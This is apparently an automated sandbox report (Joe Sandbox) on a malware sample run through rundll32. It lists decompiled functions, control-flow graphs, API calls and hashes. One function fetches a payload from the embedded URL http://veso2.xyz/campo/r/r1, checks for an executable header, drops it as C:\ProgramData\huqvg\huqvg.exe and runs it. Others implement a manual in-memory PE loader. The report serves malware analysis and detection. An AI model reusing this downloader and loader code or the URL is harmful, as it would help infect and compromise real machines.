    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_1150000_rundll32.jbxd
    Similarity
    • API ID: AllocInfoNativeSystemVirtual
    • String ID:
    • API String ID: 2032221330-0
    • Opcode ID: 460d81c489b0c162692d77f33f70033fe6d40d0b28a700ce4a73fb1871822586
    • Instruction ID: 4b51d978ad25d3ec3282084c2ab42ec92477f4806fac8ece5158a499f96d6d77
    • Opcode Fuzzy Hash: 460d81c489b0c162692d77f33f70033fe6d40d0b28a700ce4a73fb1871822586
    • Instruction Fuzzy Hash: 18D19F71604706DFD798CF99C88076AB7E0BF88318F18452DFDA58B242E774E845CB92
    Uniqueness

    Uniqueness Score: -1.00%

    Function 033710B0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 80sleepCOMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 376 33710b0-33710ed call 3371640 378 33710f2-337110a 376->378 379 3371124-337114b call 3371640 378->379 380 337110c-3371121 378->380 384 3371171-337119a call 3371a04 379->384 385 337114d-337116c call 3371350 Sleep call 33712b0 379->385 380->379 385->384
    C-Code - Quality: 49%
    			E033710B0(void* __eflags) {
				signed int _v8;
				void _v36;
				void _v68;
				signed char* _v72;
				signed char* _v76;
				char _v80;
				char _v84;
				signed char* _t28;
				signed char* _t30;
				void* _t34;
				signed char* _t46;
				signed int _t71;
				void* _t72;
				void* _t75;
				void* _t76;
				void* _t80;

				_t80 = __eflags;
				_v8 =  *0x3373004 ^ _t71;
				memcpy( &_v36, "http://veso2.xyz/campo/r/r1", 7 << 2);
				memcpy( &_v68, "C:\\ProgramData\\huqvg\\huqvg.exe", 7 << 2);
				asm("movsw");
				asm("movsb");
				_t28 = E03371640(_t80,  &_v36,  &_v84, 1); // executed
				_t75 = _t72 + 0x24;
				_v72 = _t28;
				_t46 = _v72;
				_t81 = ( *_t46 & 0x000000ff) - 0x68;
				if(( *_t46 & 0x000000ff) != 0x68) {
					 *0x3373008(_v72);
					 *0x3373020(1);
					_t75 = _t75 + 8;
				}
				_t30 = E03371640(_t81, _v72,  &_v80, 1);
				_t76 = _t75 + 0xc;
				_v76 = _t30;
				if(( *_v76 & 0x000000ff) == 0x4d) {
					E03371350(_v76, _v80,  &_v68);
					_t76 = _t76 + 0xc;
					Sleep(0x3a98);
					E033712B0();
				}
				 *0x3373008(_v76);
				_t34 =  *0x3373008(_v72);
				E03371A04();
				return _t34;
			}



















    0x033710b0
    0x033710bd
    0x033710cf
    0x033710de
    0x033710e0
    0x033710e2
    0x033710ed
    0x033710f2
    0x033710f5
    0x03371100
    0x03371107
    0x0337110a
    0x03371110
    0x0337111b
    0x03371121
    0x03371121
    0x0337112e
    0x03371133
    0x03371136
    0x0337114b
    0x03371159
    0x0337115e
    0x03371166
    0x0337116c
    0x0337116c
    0x03371175
    0x03371182
    0x03371192
    0x0337119a

    APIs
      • Part of subcall function 03371640: wsprintfA.USER32 ref: 0337173A
      • Part of subcall function 03371640: WSAStartup.WS2_32(00000102,?), ref: 0337174F
    • Sleep.KERNEL32(00003A98), ref: 03371166
    Strings
    • http://veso2.xyz/campo/r/r1, xrefs: 033710C7
    • C:\ProgramData\huqvg\huqvg.exe, xrefs: 033710D6
    Memory Dump Source
    • Source File: 00000004.00000002.668060924.0000000003371000.00000020.00000001.sdmp, Offset: 03370000, based on PE: true
    • Associated: 00000004.00000002.668050457.0000000003370000.00000004.00000001.sdmp Download File
    • Associated: 00000004.00000002.668070742.0000000003372000.00000002.00000001.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_3370000_rundll32.jbxd
    Similarity
    • API ID: SleepStartupwsprintf
    • String ID: C:\ProgramData\huqvg\huqvg.exe$http://veso2.xyz/campo/r/r1
    • API String ID: 1691369139-3004619249
    • Opcode ID: e639489f4f4e76872ed355c5709c243d1208f1387c60783ac574e68ddd65f416
    • Instruction ID: eabdbdb26e0f75d0e1c5609ed583d9a6e74c1d2bc0c8a434013f106021ace170
    • Opcode Fuzzy Hash: e639489f4f4e76872ed355c5709c243d1208f1387c60783ac574e68ddd65f416
    • Instruction Fuzzy Hash: BB21B876E001089BDB24EBE4DC85EDFBB79FF48304F140028E506AB245D679AA05CBD1
    Uniqueness

    Uniqueness Score: -1.00%

    Function 03371040, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 33COMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 394 3371040-3371092 CreateDirectoryA 395 3371094-3371096 394->395 396 3371098 394->396 397 337109a-33710a7 call 3371a04 395->397 396->397
    C-Code - Quality: 100%
    			E03371040() {
				signed int _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _t12;
				char _t13;
				int _t15;
				void* _t16;
				char _t17;
				intOrPtr _t18;
				char _t21;
				char _t22;
				signed int _t23;

				_v8 =  *0x3373004 ^ _t23;
				_t12 = "C:\\ProgramData\\huqvg"; // 0x505c3a43
				_v32 = _t12;
				_t17 = "rogramData\\huqvg"; // 0x72676f72
				_v28 = _t17;
				_t21 = "amData\\huqvg"; // 0x61446d61
				_v24 = _t21;
				_t13 = "ta\\huqvg"; // 0x685c6174
				_v20 = _t13;
				_t18 =  *0x3372110; // 0x67767175
				_v16 = _t18;
				_t22 =  *0x3372114; // 0x0
				_v12 = _t22;
				_t15 = CreateDirectoryA( &_v32, 0); // executed
				if(_t15 == 0) {
					_t16 = 0;
				} else {
					_t16 = 1;
				}
				E03371A04();
				return _t16;
			}



















    0x0337104d
    0x03371050
    0x03371055
    0x03371058
    0x0337105e
    0x03371061
    0x03371067
    0x0337106a
    0x0337106f
    0x03371072
    0x03371078
    0x0337107b
    0x03371081
    0x0337108a
    0x03371092
    0x03371098
    0x03371094
    0x03371094
    0x03371094
    0x0337109f
    0x033710a7

    APIs
    • CreateDirectoryA.KERNELBASE(?,00000000,?,?,?,?,?,?,033712A3), ref: 0337108A
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.668060924.0000000003371000.00000020.00000001.sdmp, Offset: 03370000, based on PE: true
    • Associated: 00000004.00000002.668050457.0000000003370000.00000004.00000001.sdmp Download File
    • Associated: 00000004.00000002.668070742.0000000003372000.00000002.00000001.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_3370000_rundll32.jbxd
    Similarity
    • API ID: CreateDirectory
    • String ID: C:\ProgramData\huqvg
    • API String ID: 4241100979-3793086718
    • Opcode ID: 72f895e9b85fc31beae08449a66b4f919034f2944417c79fcbdd6e7a2950d153
    • Instruction ID: ad5c5c67bb06b4a8b39f3e7a0aa1f2a10c54652a76cd0cf28d257321799ec98f
    • Opcode Fuzzy Hash: 72f895e9b85fc31beae08449a66b4f919034f2944417c79fcbdd6e7a2950d153
    • Instruction Fuzzy Hash: B7013C74E0424C9FCB24EFAAE5C16AEBBF8FB19300F004469D945D3344D6349A04CF91
    Uniqueness

    Uniqueness Score: -1.00%

    Function 011A1460, Relevance: 3.1, APIs: 2, Instructions: 104COMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 400 11a1460-11a1470 401 11a147c-11a1488 400->401 402 11a1472-11a1477 400->402 404 11a148a-11a1495 401->404 405 11a14e4-11a14f0 401->405 403 11a15aa-11a15ad 402->403 406 11a14da-11a14df 404->406 407 11a1497-11a149e 404->407 408 11a14fb 405->408 409 11a14f2-11a14f9 405->409 406->403 411 11a14c2-11a14d4 VirtualFree 407->411 412 11a14a0-11a14ae 407->412 410 11a1502-11a1514 408->410 409->410 413 11a151f 410->413 414 11a1516-11a151d 410->414 411->406 412->411 415 11a14b0-11a14c0 412->415 416 11a1526-11a1538 413->416 414->416 415->406 415->411 417 11a153a-11a1541 416->417 418 11a1543 416->418 419 11a154a-11a1574 417->419 418->419 420 11a1582-11a159f VirtualProtect 419->420 421 11a1576-11a157f 419->421 422 11a15a1-11a15a3 420->422 423 11a15a5 420->423 421->420 422->403 423->403
    C-Code - Quality: 100%
    			E011A1460(intOrPtr __ecx, intOrPtr* _a4, void** _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				long _v40;
				int _t74;

				_v36 = __ecx;
				if(_a8[2] != 0) {
					if((_a8[3] & 0x02000000) == 0) {
						if((_a8[3] & 0x20000000) == 0) {
							_v12 = 0;
						} else {
							_v12 = 1;
						}
						_v24 = _v12;
						if((_a8[3] & 0x40000000) == 0) {
							_v16 = 0;
						} else {
							_v16 = 1;
						}
						_v28 = _v16;
						if((_a8[3] & 0x80000000) == 0) {
							_v20 = 0;
						} else {
							_v20 = 1;
						}
						_v32 = _v20;
						_t48 = _v28 * 8; // 0x2347118
						_v8 =  *((intOrPtr*)((_v24 << 4) + _t48 + 0x11a5a00 + _v32 * 4));
						if((_a8[3] & 0x04000000) != 0) {
							_v8 = _v8 | 0x00000200;
						}
						_t74 = VirtualProtect( *_a8, _a8[2], _v8,  &_v40); // executed
						if(_t74 != 0) {
							return 1;
						} else {
							return 0;
						}
					}
					if( *_a8 != _a8[1]) {
						L8:
						return 1;
					}
					if(_a8[4] != 0) {
						L7:
						VirtualFree( *_a8, _a8[2], 0x4000); // executed
						goto L8;
					}
					_t14 = _a4 + 0x30; // 0x0
					if( *((intOrPtr*)( *_a4 + 0x38)) ==  *_t14 || _a8[2] %  *(_a4 + 0x30) == 0) {
						goto L7;
					} else {
						goto L8;
					}
				}
				return 1;
			}













    0x011a1466
    0x011a1470
    0x011a1488
    0x011a14f0
    0x011a14fb
    0x011a14f2
    0x011a14f2
    0x011a14f2
    0x011a1505
    0x011a1514
    0x011a151f
    0x011a1516
    0x011a1516
    0x011a1516
    0x011a1529
    0x011a1538
    0x011a1543
    0x011a153a
    0x011a153a
    0x011a153a
    0x011a154d
    0x011a1559
    0x011a1566
    0x011a1574
    0x011a157f
    0x011a157f
    0x011a1597
    0x011a159f
    0x00000000
    0x011a15a1
    0x00000000
    0x011a15a1
    0x011a159f
    0x011a1495
    0x011a14da
    0x00000000
    0x011a14da
    0x011a149e
    0x011a14c2
    0x011a14d4
    0x00000000
    0x011a14d4
    0x011a14ab
    0x011a14ae
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x011a14ae
    0x00000000

    APIs
    • VirtualFree.KERNELBASE(?,00000000,00004000,?,?,?,?,011A1718,011A4000,?,011A4000,00000000), ref: 011A14D4
    Memory Dump Source
    • Source File: 00000004.00000002.667595301.00000000011A1000.00000020.00000001.sdmp, Offset: 011A0000, based on PE: true
    • Associated: 00000004.00000002.667583917.00000000011A0000.00000004.00000001.sdmp Download File
    • Associated: 00000004.00000002.667605650.00000000011A3000.00000002.00000001.sdmp Download File
    • Associated: 00000004.00000002.667615894.00000000011A4000.00000004.00000001.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_11a0000_rundll32.jbxd
    Similarity
    • API ID: FreeVirtual
    • String ID:
    • API String ID: 1263568516-0
    • Opcode ID: f1b7602c86294db3faa663711299814d8d072bd1fc9ef9d0c503a5df25d4abaa
    • Instruction ID: e0c8d7134982ac7f93515b1db42b38c8da48d95126f48ce17223f451aabde6ad
    • Opcode Fuzzy Hash: f1b7602c86294db3faa663711299814d8d072bd1fc9ef9d0c503a5df25d4abaa
    • Instruction Fuzzy Hash: 9C41FB78A00209EFDB18CF48C094BA9BBB2FF88314F58C159E85A5F355C775EA81CB80
    Uniqueness

    Uniqueness Score: -1.00%

    Function 011A12A0, Relevance: 2.6, APIs: 2, Instructions: 115memoryCOMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 424 11a12a0-11a12ce 425 11a12e2-11a12ee 424->425 426 11a13e6 425->426 427 11a12f4-11a12fb 425->427 430 11a13eb-11a13ee 426->430 428 11a12fd-11a130a 427->428 429 11a1363-11a137e call 11a1270 427->429 431 11a135e 428->431 432 11a130c-11a132e VirtualAlloc 428->432 438 11a1380-11a1382 429->438 439 11a1384-11a13a9 VirtualAlloc 429->439 431->425 435 11a1330-11a1332 432->435 436 11a1337-11a135b call 11a1080 432->436 435->430 436->431 438->430 441 11a13ab-11a13ad 439->441 442 11a13af-11a13de call 11a10d0 439->442 441->430 442->426
    C-Code - Quality: 100%
    			E011A12A0(intOrPtr __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				void* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				long _v24;
				intOrPtr _v28;
				void* _t76;
				void* _t127;

				_v28 = __ecx;
				_t3 = _a16 + 4; // 0xf5e9
				_v16 =  *_t3;
				_t7 =  *_a16 + 0x14; // 0x508bf84d
				_t9 = ( *_t7 & 0x0000ffff) + 0x18; // 0x11a1e76
				_v8 =  *_a16 + _t9;
				_v20 = 0;
				while(1) {
					_t17 =  *_a16 + 6; // 0xe9000000
					if(_v20 >= ( *_t17 & 0x0000ffff)) {
						break;
					}
					if( *(_v8 + 0x10) != 0) {
						if(E011A1270(_v28, _a8,  *((intOrPtr*)(_v8 + 0x14)) +  *(_v8 + 0x10)) != 0) {
							_t76 = VirtualAlloc(_v16 +  *((intOrPtr*)(_v8 + 0xc)),  *(_v8 + 0x10), 0x1000, 4); // executed
							_v12 = _t76;
							if(_v12 != 0) {
								_v12 = _v16 +  *((intOrPtr*)(_v8 + 0xc));
								E011A10D0(_v12, _a4 +  *((intOrPtr*)(_v8 + 0x14)),  *(_v8 + 0x10));
								_t127 = _t127 + 0xc;
								 *((intOrPtr*)(_v8 + 8)) = _v12;
								L1:
								_v20 = _v20 + 1;
								_v8 = _v8 + 0x28;
								continue;
							}
							return 0;
						}
						return 0;
					}
					_v24 =  *((intOrPtr*)(_a12 + 0x38));
					if(_v24 <= 0) {
						L8:
						goto L1;
					}
					_v12 = VirtualAlloc(_v16 +  *((intOrPtr*)(_v8 + 0xc)), _v24, 0x1000, 4);
					if(_v12 != 0) {
						_v12 = _v16 +  *((intOrPtr*)(_v8 + 0xc));
						 *((intOrPtr*)(_v8 + 8)) = _v12;
						E011A1080(_v12, 0, _v24);
						_t127 = _t127 + 0xc;
						goto L8;
					}
					return 0;
				}
				return 1;
			}











    0x011a12a6
    0x011a12ac
    0x011a12af
    0x011a12bc
    0x011a12c0
    0x011a12c4
    0x011a12c7
    0x011a12e2
    0x011a12e7
    0x011a12ee
    0x00000000
    0x00000000
    0x011a12fb
    0x011a137e
    0x011a139c
    0x011a13a2
    0x011a13a9
    0x011a13b8
    0x011a13d0
    0x011a13d5
    0x011a13de
    0x011a12d0
    0x011a12d6
    0x011a12df
    0x00000000
    0x011a12df
    0x00000000
    0x011a13ab
    0x00000000
    0x011a1380
    0x011a1303
    0x011a130a
    0x011a135e
    0x00000000
    0x011a135e
    0x011a1327
    0x011a132e
    0x011a1340
    0x011a1349
    0x011a1356
    0x011a135b
    0x00000000
    0x011a135b
    0x00000000
    0x011a1330
    0x00000000

    APIs
    • VirtualAlloc.KERNEL32(?,00000000,00001000,00000004), ref: 011A1321
    • VirtualAlloc.KERNELBASE(?,?,00001000,00000004,00000000,?,?,011A1E5E), ref: 011A139C
    Memory Dump Source
    • Source File: 00000004.00000002.667595301.00000000011A1000.00000020.00000001.sdmp, Offset: 011A0000, based on PE: true
    • Associated: 00000004.00000002.667583917.00000000011A0000.00000004.00000001.sdmp Download File
    • Associated: 00000004.00000002.667605650.00000000011A3000.00000002.00000001.sdmp Download File
    • Associated: 00000004.00000002.667615894.00000000011A4000.00000004.00000001.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_11a0000_rundll32.jbxd
    Similarity
    • API ID: AllocVirtual
    • String ID:
    • API String ID: 4275171209-0
    • Opcode ID: f403eec8e64fd5a9d6e8bcfaf7562f6cf746d05c4589a71bc5c95965248666aa
    • Instruction ID: 2627906a1f409949ab546ff65fc893464a7a4baea137e0a448b6e6998dfb02cf
    • Opcode Fuzzy Hash: f403eec8e64fd5a9d6e8bcfaf7562f6cf746d05c4589a71bc5c95965248666aa
    • Instruction Fuzzy Hash: 1F51CB78A04209EFCB08CF94C580AAEBBB1FF48314F608599E905A7345D370EE81CB95
    Uniqueness

    Uniqueness Score: -1.00%

    Function 011A190D, Relevance: 2.5, APIs: 2, Instructions: 34COMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 446 11a190d-11a1924 IsBadReadPtr 448 11a192a-11a1931 446->448 449 11a1ae3-11a1ae9 446->449 448->449 451 11a1937-11a194e call 11a1af0 448->451 452 11a1950-11a195a 451->452 453 11a195c-11a196b SetLastError 452->453 454 11a1970-11a1985 call 11a1170 452->454 453->449 456 11a198a-11a1994 454->456 457 11a19c0-11a19f0 456->457 458 11a1996-11a19bb SetLastError 456->458 459 11a1a0b-11a1a20 457->459 460 11a19f2-11a1a09 457->460 458->449 462 11a1a23 459->462 460->462 463 11a1a37-11a1a3d 462->463 464 11a1ab8-11a1abc 463->464 465 11a1a3f-11a1a4a 463->465 466 11a1ade 464->466 467 11a1abe-11a1adc SetLastError 464->467 468 11a1a4c-11a1a73 465->468 469 11a1a75-11a1aa0 465->469 466->449 467->449 473 11a1aa2-11a1aa8 468->473 469->473 474 11a1aaa-11a1ab1 473->474 475 11a1ab3 473->475 474->464 475->463
    C-Code - Quality: 37%
    			E011A190D() {
				intOrPtr _t95;
				intOrPtr _t99;
				intOrPtr _t102;
				intOrPtr _t118;
				intOrPtr _t123;
				void* _t179;
				void* _t181;
				void* _t183;
				void* _t184;

				L0:
				while(1) {
					L0:
					 *(_t179 - 4) =  *(_t179 - 4) + 0x14;
					if(IsBadReadPtr( *(_t179 - 4), 0x14) != 0 ||  *((intOrPtr*)( *(_t179 - 4) + 0xc)) == 0) {
						break;
					}
					L3:
					_t7 =  *((intOrPtr*)(_t179 + 8)) + 0x28; // 0x0
					_t12 =  *((intOrPtr*)(_t179 + 8)) + 0x1c; // 0x0, executed
					_t99 =  *((intOrPtr*)( *_t12))( *((intOrPtr*)(_t179 - 0xc)) +  *((intOrPtr*)( *(_t179 - 4) + 0xc)),  *_t7); // executed
					_t183 = _t181 + 8;
					 *((intOrPtr*)(_t179 - 0x14)) = _t99;
					if( *((intOrPtr*)(_t179 - 0x14)) != 0) {
						L5:
						_t17 =  *((intOrPtr*)(_t179 + 8)) + 0xc; // 0xffff
						_t21 =  *((intOrPtr*)(_t179 + 8)) + 8; // 0x4
						_t102 = E011A1170( *_t21, 4 +  *_t17 * 4); // executed
						_t184 = _t183 + 8;
						 *((intOrPtr*)(_t179 - 0x20)) = _t102;
						if( *((intOrPtr*)(_t179 - 0x20)) != 0) {
							L7:
							 *((intOrPtr*)( *((intOrPtr*)(_t179 + 8)) + 8)) =  *((intOrPtr*)(_t179 - 0x20));
							_t34 =  *((intOrPtr*)(_t179 + 8)) + 0xc; // 0xffff
							_t36 =  *((intOrPtr*)(_t179 + 8)) + 8; // 0x4
							 *((intOrPtr*)( *_t36 +  *_t34 * 4)) =  *((intOrPtr*)(_t179 - 0x14));
							_t41 =  *((intOrPtr*)(_t179 + 8)) + 0xc; // 0xffff
							 *( *((intOrPtr*)(_t179 + 8)) + 0xc) =  *_t41 + 1;
							if( *( *(_t179 - 4)) == 0) {
								 *(_t179 - 8) =  *((intOrPtr*)(_t179 - 0xc)) +  *((intOrPtr*)( *(_t179 - 4) + 0x10));
								 *((intOrPtr*)(_t179 - 0x10)) =  *((intOrPtr*)(_t179 - 0xc)) +  *((intOrPtr*)( *(_t179 - 4) + 0x10));
							} else {
								 *(_t179 - 8) =  *((intOrPtr*)(_t179 - 0xc)) +  *( *(_t179 - 4));
								 *((intOrPtr*)(_t179 - 0x10)) =  *((intOrPtr*)(_t179 - 0xc)) +  *((intOrPtr*)( *(_t179 - 4) + 0x10));
							}
							L12:
							while( *( *(_t179 - 8)) != 0) {
								if(( *( *(_t179 - 8)) & 0x80000000) == 0) {
									 *((intOrPtr*)(_t179 - 0x24)) =  *((intOrPtr*)(_t179 - 0xc)) +  *( *(_t179 - 8));
									_t77 =  *((intOrPtr*)(_t179 + 8)) + 0x28; // 0x0
									_t81 =  *((intOrPtr*)(_t179 + 8)) + 0x20; // 0x0
									_t118 =  *((intOrPtr*)( *_t81))( *((intOrPtr*)(_t179 - 0x14)),  *((intOrPtr*)(_t179 - 0x24)) + 2,  *_t77);
									_t184 = _t184 + 0xc;
									 *((intOrPtr*)( *((intOrPtr*)(_t179 - 0x10)))) = _t118;
								} else {
									_t67 =  *((intOrPtr*)(_t179 + 8)) + 0x28; // 0x0
									_t71 =  *((intOrPtr*)(_t179 + 8)) + 0x20; // 0x0
									_t123 =  *((intOrPtr*)( *_t71))( *((intOrPtr*)(_t179 - 0x14)),  *( *(_t179 - 8)) & 0x0000ffff,  *_t67);
									_t184 = _t184 + 0xc;
									 *((intOrPtr*)( *((intOrPtr*)(_t179 - 0x10)))) = _t123;
								}
								L16:
								if( *((intOrPtr*)( *((intOrPtr*)(_t179 - 0x10)))) != 0) {
									L18:
									L11:
									 *(_t179 - 8) =  &(( *(_t179 - 8))[1]);
									 *((intOrPtr*)(_t179 - 0x10)) =  *((intOrPtr*)(_t179 - 0x10)) + 4;
									continue;
								} else {
									L17:
									 *((intOrPtr*)(_t179 - 0x18)) = 0;
								}
								break;
							}
							L19:
							if( *((intOrPtr*)(_t179 - 0x18)) != 0) {
								L21:
								continue;
							} else {
								L20:
								_t87 =  *((intOrPtr*)(_t179 + 8)) + 0x28; // 0x0
								_t90 =  *((intOrPtr*)(_t179 + 8)) + 0x24; // 0x0
								 *((intOrPtr*)( *_t90))( *((intOrPtr*)(_t179 - 0x14)),  *_t87);
								SetLastError(0x7f);
							}
						} else {
							L6:
							_t25 =  *((intOrPtr*)(_t179 + 8)) + 0x28; // 0x0
							_t28 =  *((intOrPtr*)(_t179 + 8)) + 0x24; // 0x0
							 *((intOrPtr*)( *_t28))( *((intOrPtr*)(_t179 - 0x14)),  *_t25);
							SetLastError(0xe);
							 *((intOrPtr*)(_t179 - 0x18)) = 0;
						}
					} else {
						L4:
						SetLastError(0x7e);
						 *((intOrPtr*)(_t179 - 0x18)) = 0;
					}
					break;
				}
				L22:
				_t95 =  *((intOrPtr*)(_t179 - 0x18));
				return _t95;
			}












    0x011a190d
    0x011a190d
    0x011a190d
    0x011a1913
    0x011a1924
    0x00000000
    0x00000000
    0x011a1937
    0x011a193a
    0x011a194b
    0x011a194e
    0x011a1950
    0x011a1953
    0x011a195a
    0x011a1970
    0x011a1973
    0x011a1981
    0x011a1985
    0x011a198a
    0x011a198d
    0x011a1994
    0x011a19c0
    0x011a19c6
    0x011a19cc
    0x011a19d2
    0x011a19d8
    0x011a19de
    0x011a19e7
    0x011a19f0
    0x011a1a14
    0x011a1a20
    0x011a19f2
    0x011a19fa
    0x011a1a06
    0x011a1a06
    0x00000000
    0x011a1a37
    0x011a1a4a
    0x011a1a7d
    0x011a1a83
    0x011a1a95
    0x011a1a98
    0x011a1a9a
    0x011a1aa0
    0x011a1a4c
    0x011a1a4f
    0x011a1a66
    0x011a1a69
    0x011a1a6b
    0x011a1a71
    0x011a1a71
    0x011a1aa2
    0x011a1aa8
    0x011a1ab3
    0x011a1a25
    0x011a1a2b
    0x011a1a34
    0x00000000
    0x011a1aaa
    0x011a1aaa
    0x011a1aaa
    0x011a1aaa
    0x00000000
    0x011a1aa8
    0x011a1ab8
    0x011a1abc
    0x011a1ade
    0x00000000
    0x011a1abe
    0x011a1abe
    0x011a1ac1
    0x011a1acc
    0x011a1acf
    0x011a1ad6
    0x011a1ad6
    0x011a1996
    0x011a1996
    0x011a1999
    0x011a19a4
    0x011a19a7
    0x011a19ae
    0x011a19b4
    0x011a19b4
    0x011a195c
    0x011a195c
    0x011a195e
    0x011a1964
    0x011a1964
    0x00000000
    0x011a195a
    0x011a1ae3
    0x011a1ae3
    0x011a1ae9

    APIs
    • IsBadReadPtr.KERNEL32(00000000,00000014), ref: 011A191C
    • SetLastError.KERNEL32(0000007E), ref: 011A195E
    • SetLastError.KERNEL32(0000000E), ref: 011A19AE
    Memory Dump Source
    • Source File: 00000004.00000002.667595301.00000000011A1000.00000020.00000001.sdmp, Offset: 011A0000, based on PE: true
    • Associated: 00000004.00000002.667583917.00000000011A0000.00000004.00000001.sdmp Download File
    • Associated: 00000004.00000002.667605650.00000000011A3000.00000002.00000001.sdmp Download File
    • Associated: 00000004.00000002.667615894.00000000011A4000.00000004.00000001.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_11a0000_rundll32.jbxd
    Similarity
    • API ID: ErrorLast$Read
    • String ID:
    • API String ID: 1935436914-0
    • Opcode ID: 6a53964c82bccadc7b74fdd14368c65bed11f1ba01782cb377bc4889e4e1868b
    • Instruction ID: 029f582e3a14b93e376b81ea335e854d6eef6ccec4ba1895468162e1546707d2
    • Opcode Fuzzy Hash: 6a53964c82bccadc7b74fdd14368c65bed11f1ba01782cb377bc4889e4e1868b
    • Instruction Fuzzy Hash: EC011D74A00208EFDB18CF94C545BAEBBB1FF44314F648158E905AB281C774DE80DB95
    Uniqueness

    Uniqueness Score: -1.00%

    Function 01191D10, Relevance: 1.6, APIs: 1, Instructions: 112COMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 478 1191d10-1191d1d 479 1191d29-1191d35 478->479 480 1191d1f-1191d24 478->480 482 1191d9d-1191da9 479->482 483 1191d37-1191d42 479->483 481 1191e71-1191e74 480->481 486 1191dab-1191db2 482->486 487 1191db4 482->487 484 1191d93-1191d98 483->484 485 1191d44-1191d4b 483->485 484->481 488 1191d4d-1191d5b 485->488 489 1191d6f-1191d8e call 1191820 485->489 490 1191dbb-1191dcd 486->490 487->490 488->489 493 1191d5d-1191d6d 488->493 495 1191d90 489->495 491 1191dd8 490->491 492 1191dcf-1191dd6 490->492 494 1191ddf-1191df1 491->494 492->494 493->484 493->489 496 1191dfc 494->496 497 1191df3-1191dfa 494->497 495->484 498 1191e03-1191e2e 496->498 497->498 499 1191e3c-1191e59 VirtualProtect 498->499 500 1191e30-1191e39 498->500 501 1191e5b-1191e6a call 1191b20 499->501 502 1191e6c 499->502 500->499 501->481 502->481
    Memory Dump Source
    • Source File: 00000004.00000002.667473154.0000000001191000.00000020.00000001.sdmp, Offset: 01191000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_1191000_rundll32.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: f61caf7e76d8d05a3f4a5300af70d01faf4a0b27ad894de6c0403e09aca9458f
    • Instruction ID: 97161bf438e20c25ddd482d5648729955bc9bd6e6a55219b1e414c1c2e0f1c23
    • Opcode Fuzzy Hash: f61caf7e76d8d05a3f4a5300af70d01faf4a0b27ad894de6c0403e09aca9458f
    • Instruction Fuzzy Hash: EE41CA74A00109AFEB09DF48C494BAEB7B2FB88324F14C559E9295F355C775EA82CB80
    Uniqueness

    Uniqueness Score: -1.00%

    Function 011A1AF0, Relevance: 1.5, APIs: 1, Instructions: 15libraryCOMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 506 11a1af0-11a1b05 LoadLibraryA 507 11a1b0b 506->507 508 11a1b07-11a1b09 506->508 509 11a1b0e-11a1b11 507->509 508->509
    C-Code - Quality: 100%
    			E011A1AF0(void* __ecx, CHAR* _a4) {
				struct HINSTANCE__* _v8;
				struct HINSTANCE__* _t6;

				_t6 = LoadLibraryA(_a4); // executed
				_v8 = _t6;
				if(_v8 != 0) {
					return _v8;
				}
				return 0;
			}





    0x011a1af8
    0x011a1afe
    0x011a1b05
    0x00000000
    0x011a1b0b
    0x00000000

    APIs
    • LoadLibraryA.KERNELBASE(?), ref: 011A1AF8
    Memory Dump Source
    • Source File: 00000004.00000002.667595301.00000000011A1000.00000020.00000001.sdmp, Offset: 011A0000, based on PE: true
    • Associated: 00000004.00000002.667583917.00000000011A0000.00000004.00000001.sdmp Download File
    • Associated: 00000004.00000002.667605650.00000000011A3000.00000002.00000001.sdmp Download File
    • Associated: 00000004.00000002.667615894.00000000011A4000.00000004.00000001.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_11a0000_rundll32.jbxd
    Similarity
    • API ID: LibraryLoad
    • String ID:
    • API String ID: 1029625771-0
    • Opcode ID: 679c9a96f3d01741ba3ebbaf6e4025e178be5c83910cbde4d3330e53e7c11d76
    • Instruction ID: c9b11e111a3e81f0828c55445e76c55a93c59c89b547f4447c525b341864c8d4
    • Opcode Fuzzy Hash: 679c9a96f3d01741ba3ebbaf6e4025e178be5c83910cbde4d3330e53e7c11d76
    • Instruction Fuzzy Hash: 73D09E7891520CFBCB14DEA4D648659BBB8E708261F504594E80993204E6319A809A91
    Uniqueness

    Uniqueness Score: -1.00%

    Function 011919F0, Relevance: 1.3, APIs: 1, Instructions: 14memoryCOMMON
    Download Yara Rule
    APIs
    • VirtualAlloc.KERNELBASE(00000000,01191A51,00003000,00000004,000000BE,?,01191A51,?), ref: 01191A01
    Memory Dump Source
    • Source File: 00000004.00000002.667473154.0000000001191000.00000020.00000001.sdmp, Offset: 01191000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_1191000_rundll32.jbxd
    Similarity
    • API ID: AllocVirtual
    • String ID:
    • API String ID: 4275171209-0
    • Opcode ID: 7633e0b11875ad5d9d2df7cc0010fd67d10b4eb24327e3986778f7d27c9c9e51
